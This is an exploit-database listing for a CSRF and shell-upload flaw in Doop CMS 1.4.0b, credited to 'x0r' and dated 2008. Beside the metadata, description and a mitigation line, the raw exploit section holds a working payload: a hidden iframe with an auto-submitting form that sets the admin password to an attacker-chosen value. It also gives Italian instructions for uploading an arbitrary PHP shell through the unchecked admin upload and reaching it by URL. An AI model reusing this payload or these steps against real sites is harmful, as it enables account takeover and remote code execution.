header-logo
Suggest Exploit
vendor:
Doop
by:
x0r
8.8
CVSS
HIGH
Cross-Site Request Forgery (CSRF) and Upload Shell
352
CWE
Product Name: Doop
Affected Version From: 1.4.0b
Affected Version To: 1.4.0b
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Doop <= 1.4.0b CSRF && Upload Shell

A CSRF vulnerability exists in Doop version 1.4.0b which allows an attacker to change the admin password. An attacker can also upload a shell to the vulnerable application and use it to gain access to the system.

Mitigation:

Ensure that the application is not vulnerable to CSRF attacks and that the application is configured to only allow the upload of specific file types.
Source

Exploit-DB raw data:

--------------------------------------------------------------------------
| Project: Doop <= 1.4.0b CSRF && Upload Shell                           |
| Author: x0r                                                            |
| Email: andry2000@hotmail.it                                            |
|________________________________________________________________________|


#-- CSRF Change Admin Pass --#

----------------------------------------------------------------------
<iframe name="noscreen" frameborder="0" height="0" width="0"></iframe> 
<form name="admin" action="http://[site/[path]/index.php?action=admin"
method="post" target="noscreen">
<input type="hidden" name="save" value="[Your_Pass]">
<input type="submit" name="submit" value="Save"> 
</form><script>document.admin.submit()</script>
----------------------------------------------------------------------


#-- Upload Shell --#

Ok. Una volta nel pannello di amministrazione possiamo uppare qualsiasi
file ( non controlla l'estensione), quindi anche shell...una volta uppata
la shell, possiamo usarla al seguente link:
http://[site]/[path]/pages/[shell.php].


# x0r
-- w00t Zone - w00tzone.org 

# milw0rm.com [2008-12-24]